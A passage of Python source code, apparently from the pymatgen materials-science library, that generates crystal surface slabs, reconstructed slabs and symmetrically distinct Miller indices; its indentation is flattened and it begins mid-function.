for i, j in enumerate(miller_index):
if j == 0:
# Lattice vector is perpendicular to surface normal, i.e.,
# in plane of surface. We will simply choose this lattice
# vector as one of the basis vectors.
slab_scale_factor.append(eye[i])
else:
# Calculate projection of lattice vector onto surface normal.
d = abs(np.dot(normal, latt.matrix[i])) / latt.abc[i]
non_orth_ind.append((i, d))
# We want the vector that has maximum magnitude in the
# direction of the surface normal as the c-direction.
# Results in a more "orthogonal" unit cell.
c_index, dist = max(non_orth_ind, key=lambda t: t[1])
if len(non_orth_ind) > 1:
lcm_miller = lcm(*[miller_index[i] for i, d in non_orth_ind])
for (i, di), (j, dj) in itertools.combinations(non_orth_ind, 2):
l = [0, 0, 0]
l[i] = -int(round(lcm_miller / miller_index[i]))
l[j] = int(round(lcm_miller / miller_index[j]))
slab_scale_factor.append(l)
if len(slab_scale_factor) == 2:
break
if max_normal_search is None:
slab_scale_factor.append(eye[c_index])
else:
index_range = sorted(
reversed(range(-max_normal_search, max_normal_search + 1)),
key=lambda x: abs(x))
candidates = []
for uvw in itertools.product(index_range, index_range, index_range):
if (not any(uvw)) or abs(
np.linalg.det(slab_scale_factor + [uvw])) < 1e-8:
continue
vec = latt.get_cartesian_coords(uvw)
l = np.linalg.norm(vec)
cosine = abs(np.dot(vec, normal) / l)
candidates.append((uvw, cosine, l))
if abs(abs(cosine) - 1) < 1e-8:
# If cosine of 1 is found, no need to search further.
break
# We want the indices with the maximum absolute cosine,
# but smallest possible length.
uvw, cosine, l = max(candidates, key=lambda x: (x[1], -x[2]))
slab_scale_factor.append(uvw)
slab_scale_factor = np.array(slab_scale_factor)
# Let's make sure we have a left-handed crystallographic system
if np.linalg.det(slab_scale_factor) < 0:
slab_scale_factor *= -1
# Make sure the slab_scale_factor is reduced to avoid
# unnecessarily large slabs
reduced_scale_factor = [reduce_vector(v) for v in slab_scale_factor]
slab_scale_factor = np.array(reduced_scale_factor)
single = initial_structure.copy()
single.make_supercell(slab_scale_factor)
# When getting the OUC, lets return the most reduced
# structure as possible to reduce calculations
self.oriented_unit_cell = Structure.from_sites(single,
to_unit_cell=True)
self.max_normal_search = max_normal_search
self.parent = initial_structure
self.lll_reduce = lll_reduce
self.center_slab = center_slab
self.slab_scale_factor = slab_scale_factor
self.miller_index = miller_index
self.min_vac_size = min_vacuum_size
self.min_slab_size = min_slab_size
self.in_unit_planes = in_unit_planes
self.primitive = primitive
self._normal = normal
a, b, c = self.oriented_unit_cell.lattice.matrix
self._proj_height = abs(np.dot(normal, c))
self.reorient_lattice = reorient_lattice
def get_slab(self, shift=0, tol=0.1, energy=None):
"""
This method takes in shift value for the c lattice direction and
generates a slab based on the given shift. You should rarely use this
method. Instead, it is used by other generation algorithms to obtain
all slabs.
Arg:
shift (float): A shift value in Angstrom that determines how much a
slab should be shifted.
tol (float): Tolerance to determine primitive cell.
energy (float): An energy to assign to the slab.
Returns:
(Slab) A Slab object with a particular shifted oriented unit cell.
"""
h = self._proj_height
p = round(h/self.parent.lattice.d_hkl(self.miller_index), 8)
if self.in_unit_planes:
nlayers_slab = int(math.ceil(self.min_slab_size / p))
nlayers_vac = int(math.ceil(self.min_vac_size / p))
else:
nlayers_slab = int(math.ceil(self.min_slab_size / h))
nlayers_vac = int(math.ceil(self.min_vac_size / h))
nlayers = nlayers_slab + nlayers_vac
species = self.oriented_unit_cell.species_and_occu
props = self.oriented_unit_cell.site_properties
props = {k: v * nlayers_slab for k, v in props.items()}
frac_coords = self.oriented_unit_cell.frac_coords
frac_coords = np.array(frac_coords) + np.array([0, 0, -shift])[None, :]
frac_coords -= np.floor(frac_coords)
a, b, c = self.oriented_unit_cell.lattice.matrix
new_lattice = [a, b, nlayers * c]
frac_coords[:, 2] = frac_coords[:, 2] / nlayers
all_coords = []
for i in range(nlayers_slab):
fcoords = frac_coords.copy()
fcoords[:, 2] += i / nlayers
all_coords.extend(fcoords)
slab = Structure(new_lattice, species * nlayers_slab, all_coords,
site_properties=props)
scale_factor = self.slab_scale_factor
# Whether or not to orthogonalize the structure
if self.lll_reduce:
lll_slab = slab.copy(sanitize=True)
mapping = lll_slab.lattice.find_mapping(slab.lattice)
scale_factor = np.dot(mapping[2], scale_factor)
slab = lll_slab
# Whether or not to center the slab layer around the vacuum
if self.center_slab:
avg_c = np.average([c[2] for c in slab.frac_coords])
slab.translate_sites(list(range(len(slab))), [0, 0, 0.5 - avg_c])
if self.primitive:
prim = slab.get_primitive_structure(tolerance=tol)
if energy is not None:
energy = prim.volume / slab.volume * energy
slab = prim
# Reorient the lattice to get the correct reduced cell
ouc = self.oriented_unit_cell.copy()
if self.primitive:
#find a reduced ouc
slab_l = slab.lattice
ouc = ouc.get_primitive_structure(constrain_latt={"a": slab_l.a, "b": slab_l.b,
"alpha": slab_l.alpha,
"beta": slab_l.beta,
"gamma": slab_l.gamma})
return Slab(slab.lattice, slab.species_and_occu,
slab.frac_coords, self.miller_index,
ouc, shift, scale_factor, energy=energy,
site_properties=slab.site_properties,
reorient_lattice=self.reorient_lattice)
def _calculate_possible_shifts(self, tol=0.1):
frac_coords = self.oriented_unit_cell.frac_coords
n = len(frac_coords)
if n == 1:
# Clustering does not work when there is only one data point.
shift = frac_coords[0][2] + 0.5
return [shift - math.floor(shift)]
# We cluster the sites according to the c coordinates. But we need to
# take into account PBC. Let's compute a fractional c-coordinate
# distance matrix that accounts for PBC.
dist_matrix = np.zeros((n, n))
h = self._proj_height
# Projection of c lattice vector in
# direction of surface normal.
for i, j in itertools.combinations(list(range(n)), 2):
if i != j:
cdist = frac_coords[i][2] - frac_coords[j][2]
cdist = abs(cdist - round(cdist)) * h
dist_matrix[i, j] = cdist
dist_matrix[j, i] = cdist
condensed_m = squareform(dist_matrix)
z = linkage(condensed_m)
clusters = fcluster(z, tol, criterion="distance")
# Generate dict of cluster# to c val - doesn't matter what the c is.
c_loc = {c: frac_coords[i][2] for i, c in enumerate(clusters)}
# Put all c into the unit cell.
possible_c = [c - math.floor(c) for c in sorted(c_loc.values())]
# Calculate the shifts
nshifts = len(possible_c)
shifts = []
for i in range(nshifts):
if i == nshifts - 1:
# There is an additional shift between the first and last c
# coordinate. But this needs special handling because of PBC.
shift = (possible_c[0] + 1 + possible_c[i]) * 0.5
if shift > 1:
shift -= 1
else:
shift = (possible_c[i] + possible_c[i + 1]) * 0.5
shifts.append(shift - math.floor(shift))
shifts = sorted(shifts)
return shifts
def _get_c_ranges(self, bonds):
c_ranges = set()
bonds = {(get_el_sp(s1), get_el_sp(s2)): dist for (s1, s2), dist in
bonds.items()}
for (sp1, sp2), bond_dist in bonds.items():
for site in self.oriented_unit_cell:
if sp1 in site.species:
for nn, d in self.oriented_unit_cell.get_neighbors(
site, bond_dist):
if sp2 in nn.species:
c_range = tuple(sorted([site.frac_coords[2],
nn.frac_coords[2]]))
if c_range[1] > 1:
# Takes care of PBC when c coordinate of site
# goes beyond the upper boundary of the cell
c_ranges.add((c_range[0], 1))
c_ranges.add((0, c_range[1] - 1))
elif c_range[0] < 0:
# Takes care of PBC when c coordinate of site
# is below the lower boundary of the unit cell
c_ranges.add((0, c_range[1]))
c_ranges.add((c_range[0] + 1, 1))
elif c_range[0] != c_range[1]:
c_ranges.add(c_range)
return c_ranges
def get_slabs(self, bonds=None, ftol=0.1, tol=0.1, max_broken_bonds=0,
symmetrize=False, repair=False):
"""
This method returns a list of slabs that are generated using the list of
shift values from the method, _calculate_possible_shifts(). Before the
shifts are used to create the slabs however, if the user decides to take
into account whether or not a termination will break any polyhedral
structure (bonds is not None), this method will filter out any shift
values that do so.
Args:
bonds ({(specie1, specie2): max_bond_dist}: bonds are
specified as a dict of tuples: float of specie1, specie2
and the max bonding distance. For example, PO4 groups may be
defined as {("P", "O"): 3}.
tol (float): General tolerance paramter for getting primitive
cells and matching structures
ftol (float): Threshold parameter in fcluster in order to check
if two atoms are lying on the same plane. Default thresh set
to 0.1 Angstrom in the direction of the surface normal.
max_broken_bonds (int): Maximum number of allowable broken bonds
for the slab. Use this to limit # of slabs (some structures
may have a lot of slabs). Defaults to zero, which means no
defined bonds must be broken.
symmetrize (bool): Whether or not to ensure the surfaces of the
slabs are equivalent.
repair (bool): Whether to repair terminations with broken bonds
or just omit them. Set to False as repairing terminations can
lead to many possible slabs as oppose to just omitting them.
Returns:
([Slab]) List of all possible terminations of a particular surface.
Slabs are sorted by the # of bonds broken.
"""
c_ranges = set() if bonds is None else self._get_c_ranges(bonds)
slabs = []
for shift in self._calculate_possible_shifts(tol=ftol):
bonds_broken = 0
for r in c_ranges:
if r[0] <= shift <= r[1]:
bonds_broken += 1
slab = self.get_slab(shift, tol=tol, energy=bonds_broken)
if bonds_broken <= max_broken_bonds:
slabs.append(slab)
elif repair:
# If the number of broken bonds is exceeded,
# we repair the broken bonds on the slab
slabs.append(self.repair_broken_bonds(slab, bonds))
# Further filters out any surfaces made that might be the same
m = StructureMatcher(ltol=tol, stol=tol, primitive_cell=False,
scale=False)
new_slabs = []
for g in m.group_structures(slabs):
# For each unique termination, symmetrize the
# surfaces by removing sites from the bottom.
if symmetrize:
slabs = self.nonstoichiometric_symmetrized_slab(g[0])
new_slabs.extend(slabs)
else:
new_slabs.append(g[0])
match = StructureMatcher(ltol=tol, stol=tol, primitive_cell=False,
scale=False)
new_slabs = [g[0] for g in match.group_structures(new_slabs)]
return sorted(new_slabs, key=lambda s: s.energy)
def repair_broken_bonds(self, slab, bonds):
"""
This method will find undercoordinated atoms due to slab
cleaving specified by the bonds parameter and move them
to the other surface to make sure the bond is kept intact.
In a future release of surface.py, the ghost_sites will be
used to tell us how the repair bonds should look like.
Arg:
slab (structure): A structure object representing a slab.
bonds ({(specie1, specie2): max_bond_dist}: bonds are
specified as a dict of tuples: float of specie1, specie2
and the max bonding distance. For example, PO4 groups may be
defined as {("P", "O"): 3}.
Returns:
(Slab) A Slab object with a particular shifted oriented unit cell.
"""
for pair in bonds.keys():
blength = bonds[pair]
# First lets determine which element should be the
# reference (center element) to determine broken bonds.
# e.g. P for a PO4 bond. Find integer coordination
# numbers of the pair of elements wrt to each other
cn_dict = {}
for i, el in enumerate(pair):
cnlist = []
for site in self.oriented_unit_cell:
poly_coord = 0
if site.species_string == el:
for nn in self.oriented_unit_cell.get_neighbors(
site, blength):
if nn[0].species_string == pair[i-1]:
poly_coord += 1
cnlist.append(poly_coord)
cn_dict[el] = cnlist
# We make the element with the higher coordination our reference
if max(cn_dict[pair[0]]) > max(cn_dict[pair[1]]):
element1, element2 = pair
else:
element2, element1 = pair
for i, site in enumerate(slab):
# Determine the coordination of our reference
if site.species_string == element1:
poly_coord = 0
for neighbor in slab.get_neighbors(site, blength):
poly_coord += 1 if neighbor[0].species_string == element2 else 0
# suppose we find an undercoordinated reference atom
if poly_coord not in cn_dict[element1]:
# We get the reference atom of the broken bonds
# (undercoordinated), move it to the other surface
slab = self.move_to_other_side(slab, [i])
# find its NNs with the corresponding
# species it should be coordinated with
neighbors = slab.get_neighbors(slab[i], blength,
include_index=True)
tomove = [nn[2] for nn in neighbors if
nn[0].species_string == element2]
tomove.append(i)
# and then move those NNs along with the central
# atom back to the other side of the slab again
slab = self.move_to_other_side(slab, tomove)
return slab
def move_to_other_side(self, init_slab, index_of_sites):
"""
This method will Move a set of sites to the
other side of the slab (opposite surface).
Arg:
init_slab (structure): A structure object representing a slab.
index_of_sites (list of ints): The list of indices representing
the sites we want to move to the other side.
Returns:
(Slab) A Slab object with a particular shifted oriented unit cell.
"""
slab = init_slab.copy()
# Determine what fraction the slab is of the total cell size
# in the c direction. Round to nearest rational number.
h = self._proj_height
p = h/self.parent.lattice.d_hkl(self.miller_index)
if self.in_unit_planes:
nlayers_slab = int(math.ceil(self.min_slab_size / p))
nlayers_vac = int(math.ceil(self.min_vac_size / p))
else:
nlayers_slab = int(math.ceil(self.min_slab_size / h))
nlayers_vac = int(math.ceil(self.min_vac_size / h))
nlayers = nlayers_slab + nlayers_vac
slab_ratio = nlayers_slab / nlayers
# Sort the index of sites based on which side they are on
top_site_index = [ i for i in index_of_sites if
slab[i].frac_coords[2] > slab.center_of_mass[2]]
bottom_site_index = [ i for i in index_of_sites if
slab[i].frac_coords[2] < slab.center_of_mass[2]]
# Translate sites to the opposite surfaces
slab.translate_sites(top_site_index, [0, 0, slab_ratio])
slab.translate_sites(bottom_site_index, [0, 0, -slab_ratio])
return Slab(init_slab.lattice, slab.species, slab.frac_coords,
init_slab.miller_index, init_slab.oriented_unit_cell,
init_slab.shift, init_slab.scale_factor,
energy=init_slab.energy)
def nonstoichiometric_symmetrized_slab(self, init_slab, tol=1e-3):
"""
This method checks whether or not the two surfaces of the slab are
equivalent. If the point group of the slab has an inversion symmetry (
ie. belong to one of the Laue groups), then it is assumed that the
surfaces should be equivalent. Otherwise, sites at the bottom of the
slab will be removed until the slab is symmetric. Note the removal of sites
can destroy the stoichiometry of the slab. For non-elemental
structures, the chemical potential will be needed to calculate surface energy.
Arg:
init_slab (Structure): A single slab structure
tol (float): Tolerance for SpaceGroupanalyzer.
Returns:
Slab (structure): A symmetrized Slab object.
"""
sg = SpacegroupAnalyzer(init_slab, symprec=tol)
if sg.is_laue():
return [init_slab]
nonstoich_slabs = []
# Build an equivalent surface slab for each of the different surfaces
for top in [True, False]:
asym = True
slab = init_slab.copy()
slab.energy = init_slab.energy
while asym:
# Keep removing sites from the bottom one by one until both
# surfaces are symmetric or the number of sites removed has
# exceeded 10 percent of the original slab
c_dir = [site[2] for i, site in enumerate(slab.frac_coords)]
if top:
slab.remove_sites([c_dir.index(max(c_dir))])
else:
slab.remove_sites([c_dir.index(min(c_dir))])
if len(slab) <= len(self.parent):
break
# Check if the altered surface is symmetric
sg = SpacegroupAnalyzer(slab, symprec=tol)
if sg.is_laue():
asym = False
nonstoich_slabs.append(slab)
if len(slab) <= len(self.parent):
warnings.warn("Too many sites removed, please use a larger slab "
"size.")
return nonstoich_slabs
module_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(module_dir,
"reconstructions_archive.json")) as data_file:
reconstructions_archive = json.load(data_file)
class ReconstructionGenerator:
"""
This class takes in a pre-defined dictionary specifying the parameters
need to build a reconstructed slab such as the SlabGenerator parameters,
transformation matrix, sites to remove/add and slab/vacuum size. It will
then use the formatted instructions provided by the dictionary to build
the desired reconstructed slab from the initial structure.
.. attribute:: slabgen_params
Parameters for the SlabGenerator
.. trans_matrix::
A 3x3 transformation matrix to generate the reconstructed
slab. Only the a and b lattice vectors are actually
changed while the c vector remains the same. This
matrix is what the Wood's notation is based on.
.. reconstruction_json::
The full json or dictionary containing the instructions
for building the reconstructed slab
.. termination::
The index of the termination of the slab
TODO:
- Right now there is no way to specify what atom is being
added. In the future, use basis sets?
"""
def __init__(self, initial_structure, min_slab_size,
min_vacuum_size, reconstruction_name):
"""
Generates reconstructed slabs from a set of instructions
specified by a dictionary or json file.
Args:
initial_structure (Structure): Initial input structure. Note
that to ensure that the miller indices correspond to usual
crystallographic definitions, you should supply a conventional
unit cell structure.
min_slab_size (float): In Angstroms
min_vacuum_size (float): In Angstroms
reconstruction (str): Name of the dict containing the instructions
for building a reconstructed slab. The dictionary can contain
any item the creator deems relevant, however any instructions
archived in pymatgen for public use needs to contain the
following keys and items to ensure compatibility with the
ReconstructionGenerator:
"name" (str): A descriptive name for the type of
reconstruction. Typically the name will have the type
of structure the reconstruction is for, the Miller
index, and Wood's notation along with anything to
describe the reconstruction: e.g.:
"fcc_110_missing_row_1x2"
"description" (str): A longer description of your
reconstruction. This is to help future contributors who
want to add other types of reconstructions to the
archive on pymatgen to check if the reconstruction
already exists. Please read the descriptions carefully
before adding a new type of reconstruction to ensure it
is not in the archive yet.
"reference" (str): Optional reference to where the
reconstruction was taken from or first observed.
"spacegroup" (dict): e.g. {"symbol": "Fm-3m", "number": 225}
Indicates what kind of structure is this reconstruction.
"miller_index" ([h,k,l]): Miller index of your reconstruction
"Woods_notation" (str): For a reconstruction, the a and b
lattice may change to accomodate the symmetry of the
reconstruction. This notation indicates the change in
the vectors relative to the primitive (p) or
conventional (c) slab cell. E.g. p(2x1):
Wood, E. A. (1964). Vocabulary of surface
crystallography. Journal of Applied Physics, 35(4),
1306–1312.
"transformation_matrix" (numpy array): A 3x3 matrix to
transform the slab. Only the a and b lattice vectors
should change while the c vector remains the same.
"SlabGenerator_parameters" (dict): A dictionary containing
the parameters for the SlabGenerator class excluding the
miller_index, min_slab_size and min_vac_size as the
Miller index is already specified and the min_slab_size
and min_vac_size can be changed regardless of what type
of reconstruction is used. Having a consistent set of
SlabGenerator parameters allows for the instructions to
be reused to consistently build a reconstructed slab.
"points_to_remove" (list of coords): A list of sites to
remove where the first two indices are fraction (in a
and b) and the third index is in units of 1/d (in c).
"points_to_add" (list of frac_coords): A list of sites to add
where the first two indices are fraction (in a an b) and
the third index is in units of 1/d (in c).
"base_reconstruction" (dict): Option to base a reconstruction on
an existing reconstruction model also exists to easily build
the instructions without repeating previous work. E.g. the
alpha reconstruction of halites is based on the octopolar
reconstruction but with the topmost atom removed. The dictionary
for the alpha reconstruction would therefore contain the item
"reconstruction_base": "halite_111_octopolar_2x2", and
additional sites for "points_to_remove" and "points_to_add"
can be added to modify this reconstruction.
For "points_to_remove" and "points_to_add", the third index for
the c vector is in units of 1/d where d is the spacing
between atoms along hkl (the c vector) and is relative to
the topmost site in the unreconstructed slab. e.g. a point
of [0.5, 0.25, 1] corresponds to the 0.5 frac_coord of a,
0.25 frac_coord of b and a distance of 1 atomic layer above
the topmost site. [0.5, 0.25, -0.5] where the third index
corresponds to a point half a atomic layer below the topmost
site. [0.5, 0.25, 0] corresponds to a point in the same
position along c as the topmost site. This is done because
while the primitive units of a and b will remain constant,
the user can vary the length of the c direction by changing
the slab layer or the vacuum layer.
NOTE: THE DICTIONARY SHOULD ONLY CONTAIN "points_to_remove" AND
"points_to_add" FOR THE TOP SURFACE. THE ReconstructionGenerator
WILL MODIFY THE BOTTOM SURFACE ACCORDINGLY TO RETURN A SLAB WITH
EQUIVALENT SURFACES.
"""
if reconstruction_name not in reconstructions_archive.keys():
raise KeyError("The reconstruction_name entered (%s) does not exist in the "
"archive. Please select from one of the following reconstructions: %s "
"or add the appropriate dictionary to the archive file "
"reconstructions_archive.json." %(reconstruction_name,
list(reconstructions_archive.keys())))
# Get the instructions to build the reconstruction
# from the reconstruction_archive
recon_json = copy.deepcopy(reconstructions_archive[reconstruction_name])
new_points_to_add, new_points_to_remove = [], []
if "base_reconstruction" in recon_json.keys():
if "points_to_add" in recon_json.keys():
new_points_to_add = recon_json["points_to_add"]
if "points_to_remove" in recon_json.keys():
new_points_to_remove = recon_json["points_to_remove"]
# Build new instructions from a base reconstruction
recon_json = copy.deepcopy(reconstructions_archive[recon_json["base_reconstruction"]])
if "points_to_add" in recon_json.keys():
del recon_json["points_to_add"]
if "points_to_remove" in recon_json.keys():
del recon_json["points_to_remove"]
if new_points_to_add:
recon_json["points_to_add"] = new_points_to_add
if new_points_to_remove:
recon_json["points_to_remove"] = new_points_to_remove
slabgen_params = copy.deepcopy(recon_json["SlabGenerator_parameters"])
slabgen_params["initial_structure"] = initial_structure.copy()
slabgen_params["miller_index"] = recon_json["miller_index"]
slabgen_params["min_slab_size"] = min_slab_size
slabgen_params["min_vacuum_size"] = min_vacuum_size
self.slabgen_params = slabgen_params
self.trans_matrix = recon_json["transformation_matrix"]
self.reconstruction_json = recon_json
self.name = reconstruction_name
def build_slabs(self):
"""
Builds the reconstructed slab by:
(1) Obtaining the unreconstructed slab using the specified
parameters for the SlabGenerator.
(2) Applying the appropriate lattice transformation in the
a and b lattice vectors.
(3) Remove any specified sites from both surfaces.
(4) Add any specified sites to both surfaces.
Returns:
(Slab): The reconstructed slab.
"""
slabs = self.get_unreconstructed_slabs()
recon_slabs = []
for slab in slabs:
d = get_d(slab)
top_site = sorted(slab, key=lambda site: site.frac_coords[2])[-1].coords
# Remove any specified sites
if "points_to_remove" in self.reconstruction_json.keys():
pts_to_rm = copy.deepcopy(self.reconstruction_json["points_to_remove"])
for p in pts_to_rm:
p[2] = slab.lattice.get_fractional_coords([top_site[0], top_site[1],
top_site[2]+p[2]*d])[2]
cart_point = slab.lattice.get_cartesian_coords(p)
dist = [site.distance_from_point(cart_point) for site in slab]
site1 = dist.index(min(dist))
slab.symmetrically_remove_atoms([site1])
# Add any specified sites
if "points_to_add" in self.reconstruction_json.keys():
pts_to_add = copy.deepcopy(self.reconstruction_json["points_to_add"])
for p in pts_to_add:
p[2] = slab.lattice.get_fractional_coords([top_site[0], top_site[1],
top_site[2]+p[2]*d])[2]
slab.symmetrically_add_atom(slab[0].specie, p)
slab.reconstruction = self.name
setattr(slab, "recon_trans_matrix", self.trans_matrix)
# Get the oriented_unit_cell with the same axb area.
ouc = slab.oriented_unit_cell.copy()
ouc.make_supercell(self.trans_matrix)
slab.oriented_unit_cell = ouc
recon_slabs.append(slab)
return recon_slabs
def get_unreconstructed_slabs(self):
"""
Generates the unreconstructed or pristine super slab.
"""
slabs = []
for slab in SlabGenerator(**self.slabgen_params).get_slabs():
slab.make_supercell(self.trans_matrix)
slabs.append(slab)
return slabs
def get_d(slab):
"""
Determine the distance of space between
each layer of atoms along c
"""
sorted_sites = sorted(slab, key=lambda site: site.frac_coords[2])
for i, site in enumerate(sorted_sites):
if "%.6f" % (site.frac_coords[2]) == \
"%.6f" % (sorted_sites[i + 1].frac_coords[2]):
continue
else:
d = abs(site.frac_coords[2] - \
sorted_sites[i + 1].frac_coords[2])
break
return slab.lattice.get_cartesian_coords([0, 0, d])[2]
def get_recp_symmetry_operation(structure, symprec=0.01):
"""
Find the symmetric operations of the reciprocal lattice,
to be used for hkl transformations
Args:
structure (Structure): conventional unit cell
symprec: default is 0.001
"""
recp_lattice = structure.lattice.reciprocal_lattice_crystallographic
# get symmetry operations from input conventional unit cell
# Need to make sure recp lattice is big enough, otherwise symmetry
# determination will fail. We set the overall volume to 1.
recp_lattice = recp_lattice.scale(1)
recp = Structure(recp_lattice, ["H"], [[0, 0, 0]])
# Creates a function that uses the symmetry operations in the
# structure to find Miller indices that might give repetitive slabs
analyzer = SpacegroupAnalyzer(recp, symprec=symprec)
recp_symmops = analyzer.get_symmetry_operations()
return recp_symmops
def get_symmetrically_distinct_miller_indices(structure, max_index):
"""
Returns all symmetrically distinct indices below a certain max-index for
a given structure. Analysis is based on the symmetry of the reciprocal
lattice of the structure.
Args:
structure (Structure): input structure.
max_index (int): The maximum index. For example, a max_index of 1
means that (100), (110), and (111) are returned for the cubic
structure. All other indices are equivalent to one of these.
"""
r = list(range(-max_index, max_index + 1))
r.reverse()
# First we get a list of all hkls for conventional (including equivalent)
conv_hkl_list = [miller for miller in itertools.product(r, r, r) if any([i != 0 for i in miller])]
sg = SpacegroupAnalyzer(structure)
# Get distinct hkl planes from the rhombohedral setting if trigonal
if sg.get_crystal_system() == "trigonal":
transf = sg.get_conventional_to_primitive_transformation_matrix()
miller_list = [hkl_transformation(transf, hkl) for hkl in conv_hkl_list]
prim_structure = SpacegroupAnalyzer(structure).get_primitive_standard_structure()
symm_ops = get_recp_symmetry_operation(prim_structure)
else:
miller_list = conv_hkl_list
symm_ops = get_recp_symmetry_operation(structure)
unique_millers, unique_millers_conv = [], []
def is_already_analyzed(miller_index):
for op in symm_ops:
if in_coord_list(unique_millers, op.operate(miller_index)):
return True
return False
for i, miller in enumerate(miller_list):
d = abs(reduce(gcd, miller))
miller = tuple([int(i / d) for i in miller])
if not is_already_analyzed(miller):
if sg.get_crystal_system() == "trigonal":
# Now we find the distinct primitive hkls using
# the primitive symmetry operations and their
# corresponding hkls in the conventional setting
unique_millers.append(miller)
d = abs(reduce(gcd, conv_hkl_list[i]))
cmiller = tuple([int(i / d) for i in conv_hkl_list[i]])
unique_millers_conv.append(cmiller)
else:
unique_millers.append(miller)
unique_millers_conv.append(miller)
return unique_millers_conv
def hkl_transformation(transf, miller_index):
"""
Returns the Miller index from setting
A to B using a transformation matrix
Args:
transf (3x3 array): The transformation matrix
that transforms a lattice of A to B
miller_index ([h, k, l]): Miller index to transform to setting B
"""
# Get a matrix of whole numbers (ints)
lcm = lambda a, b: a * b // math.gcd(a, b)
reduced_transf = reduce(lcm, [int(1 / i) for i in itertools.chain(*transf) if i != 0]) * transf
reduced_transf = reduced_transf.astype(int)
# perform the transformation
t_hkl = np.dot(reduced_transf, miller_index)
d = abs(reduce(gcd, t_hkl))
t_hkl = np.array([int(i / d) for i in t_hkl])
# get mostly positive oriented Miller index
if len([i for i in t_hkl if i < 0]) > 1:
t_hkl *= -1
return tuple(t_hkl)
def generate_all_slabs(structure, max_index, min_slab_size, min_vacuum_size,
bonds=None, tol=0.1, ftol=0.1, max_broken_bonds=0,
lll_reduce=False, center_slab=False, primitive=True,
max_normal_search=None, symmetrize=False, repair=False,
include_reconstructions=False, in_unit_planes=False):
"""
A function that finds all different slabs up to a certain miller index.
Slabs oriented under certain Miller indices that are equivalent to other
slabs in other Miller indices are filtered out using symmetry operations
to get rid of any repetitive slabs. For example, under symmetry operations,
CsCl has equivalent slabs in the (0,0,1), (0,1,0), and (1,0,0) direction.
Args:
structure (Structure): Initial input structure. Note that to
ensure that the miller indices correspond to usual
crystallographic definitions, you should supply a conventional
unit cell structure.
max_index (int): The maximum Miller index to go up to.
min_slab_size (float): In Angstroms
min_vacuum_size (float): In Angstroms
bonds ({(specie1, specie2): max_bond_dist}: bonds are
specified as a dict of tuples: float of specie1, specie2
and the max bonding distance. For example, PO4 groups may be
defined as {("P", "O"): 3}.
tol (float): Threshold parameter in fcluster in order to check
if two atoms are lying on the same plane. Default thresh set
to 0.1 Angstrom in the direction of the surface normal.
max_broken_bonds (int): Maximum number of allowable broken bonds
for the slab. Use this to limit # of slabs (some structures
may have a lot of slabs). Defaults to zero, which means no
defined bonds must be broken.
lll_reduce (bool): Whether to perform an LLL reduction on the
eventual structure.
center_slab (bool): Whether to center the slab in the cell with
equal vacuum spacing from the top and bottom.
primitive (bool): Whether to reduce any generated slabs to a
primitive cell (this does **not** mean the slab is generated
from a primitive cell, it simply means that after slab
generation, we attempt to find shorter lattice vectors,
which lead to less surface area and smaller cells).
max_normal_search (int): If set to a positive integer, the code will
conduct a search for a normal lattice vector that is as
perpendicular to the surface as possible by considering
multiples linear combinations of lattice vectors up to
max_normal_search. This has no bearing on surface energies,
but may be useful as a preliminary step to generating slabs
for absorption and other sizes. It is typical that this will
not be the smallest possible cell for simulation. Normality
is not guaranteed, but the oriented cell will have the c
vector as normal as possible (within the search range) to the
surface. A value of up to the max absolute Miller index is
usually sufficient.
symmetrize (bool): Whether or not to ensure the surfaces of the
slabs are equivalent.
repair (bool): Whether to repair terminations with broken bonds
or just omit them
include_reconstructions (bool): Whether to include reconstructed
slabs available in the reconstructions_archive.json file.
"""
all_slabs = []
for miller in get_symmetrically_distinct_miller_indices(structure,
max_index):
gen = SlabGenerator(structure, miller, min_slab_size,
min_vacuum_size, lll_reduce=lll_reduce,
center_slab=center_slab, primitive=primitive,
max_normal_search=max_normal_search,
in_unit_planes=in_unit_planes)
slabs = gen.get_slabs(bonds=bonds, tol=tol, ftol=ftol, symmetrize=symmetrize,
max_broken_bonds=max_broken_bonds, repair=repair)
if len(slabs) > 0:
logger.debug("%s has %d slabs... " % (miller, len(slabs)))
all_slabs.extend(slabs)
if include_reconstructions:
sg = SpacegroupAnalyzer(structure)
symbol = sg.get_space_group_symbol()
# enumerate through all posisble reconstructions in the
# archive available for this particular structure (spacegroup)
for name, instructions in reconstructions_archive.items():
if "base_reconstruction" in instructions.keys():
instructions = reconstructions_archive[instructions["base_reconstruction"]]
if instructions["spacegroup"]["symbol"] == symbol:
# check if this reconstruction has a max index
# equal or less than the given max index
if max(instructions["miller_index"]) > max_index:
continue
recon = ReconstructionGenerator(structure, min_slab_size,
min_vacuum_size, name)
all_slabs.extend(recon.build_slabs())
return all_slabs
def get_slab_regions(slab, blength=3.5):
"""
Function to get the ranges of the slab regions. Useful for discerning where
the slab ends and vacuum begins if the slab is not fully within the cell
Args:
slab (Structure): Structure object modelling the surface
blength (float, Ang): The bondlength between atoms. You generally
want this value to be larger than the actual bondlengths in
order to find atoms that are part of the slab
"""
fcoords, indices, all_indices = [], [], []
for site in slab:
# find sites with c < 0 (noncontiguous)
neighbors = slab.get_neighbors(site, blength, include_index=True,
include_image=True)
for nn in neighbors:
if nn[0].frac_coords[2] < 0:
# sites are noncontiguous within cell
fcoords.append(nn[0].frac_coords[2])
indices.append(nn[-2])
if nn[-2] not in all_indices:
all_indices.append(nn[-2])
if fcoords:
# If slab is noncontiguous, locate the lowest
# site within the upper region of the slab
while fcoords:
last_fcoords = copy.copy(fcoords)
last_indices = copy.copy(indices)
site = slab[indices[fcoords.index(min(fcoords))]]
neighbors = slab.get_neighbors(site, blength, include_index=True,
include_image=True)
fcoords, indices = [], []
for nn in neighbors:
if 1 > nn[0].frac_coords[2] > 0 and \
nn[0].frac_coords[2] < site.frac_coords[2]:
# sites are noncontiguous within cell
fcoords.append(nn[0].frac_coords[2])
indices.append(nn[-2])
if nn[-2] not in all_indices:
all_indices.append(nn[-2])
# Now locate the highest site within the lower region of the slab
upper_fcoords = []
for site in slab:
if all([nn[-1] not in all_indices for nn in
slab.get_neighbors(site, blength,
include_index=True)]):
upper_fcoords.append(site.frac_coords[2])
coords = copy.copy(last_fcoords) if not fcoords else copy.copy(fcoords)
min_top = slab[last_indices[coords.index(min(coords))]].frac_coords[2]
ranges = [[0, max(upper_fcoords)], [min_top, 1]]
else:
# If the entire slab region is within the slab cell, just
# set the range as the highest and lowest site in the slab
sorted_sites = sorted(slab, key=lambda site: site.frac_coords[2])
ranges = [[sorted_sites[0].frac_coords[2],
sorted_sites[-1].frac_coords[2]]]
return ranges
